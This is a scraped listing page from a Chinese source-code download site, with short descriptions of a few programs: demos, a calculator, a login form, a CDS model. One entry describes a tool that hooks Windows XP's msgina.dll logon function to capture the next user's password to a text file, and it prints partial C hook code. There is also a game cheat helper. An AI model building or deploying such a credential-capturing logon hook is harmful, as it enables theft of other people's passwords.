-
一个简单的跑马灯例子
,拿来与大家共享, c#开发
一个简单的跑马灯例子
,拿来与大家共享, c#开发-pao ma deng example
- 2022-03-23 19:05:36下载
- 积分:1
-
c++ 完美演绎
c++ 完美演绎 -c++ perfect interpretation
- 2022-06-29 12:51:40下载
- 积分:1
-
用C写的通讯录小程序
大家一起交流一下
用C写的通讯录小程序
大家一起交流一下-Address Book using C to write small programs of exchange with U.S.
- 2022-02-02 01:22:07下载
- 积分:1
-
【[辅助程序]开心001
【[辅助程序]开心001-争车位】开心网 -争车位 辅助程序,供热爱开心网的朋友更方便的玩开心网,-www.kaixin001.com-weisjohn.blog.163.com
- 2022-05-25 21:00:06下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
登陆界面程序
利用vc6.0开发的软件登陆界面程序,可以实现用户和password 限制使用程序的权限,可以将此程序嵌入编写的其他程序中衣限制别人的访问。
- 2023-09-09 06:35:04下载
- 积分:1
-
ADO visits access database.It contains many sql sentences,very significant to be...
ADO访问访问数据库。它包含许多sql语句,对初学者很有意义
- 2022-12-24 01:25:03下载
- 积分:1
-
需要platformbuild调试,是对系统对堆的分配,和回收策略的一个例程...
需要platformbuild调试,是对系统对堆的分配,和回收策略的一个例程-Need to debug platformbuild is the distribution system to the reactor, and recovery strategy for a routine
- 2022-01-24 13:21:48下载
- 积分:1
-
ISDA信用违约互换(CDS)的模型(Excel)和(c)
ISDA Credit Default Swap (CDS) Model (Excel and C)
- 2022-01-31 00:55:30下载
- 积分:1
-
采用 Windows 表单的简单计算器
翻译 maninwest@Codeforge作者:Yvan Rodrigues@CodeProject 使用代码 using System;
using System.Windows.Forms;
namespace RedCell.App.Calculator.Example
{
public partial class Form1 : Form
{
private double accumulator = 0;
private char lastOperation;
public Form1()
{
InitializeComponent();
}
private void Operator_Pressed(object sender, EventArgs e)
{
// An operator was pressed; perform the last operation and store the new operator.
char operation = (sender as Button).Text[0];
- 2022-06-29 09:36:47下载
- 积分:1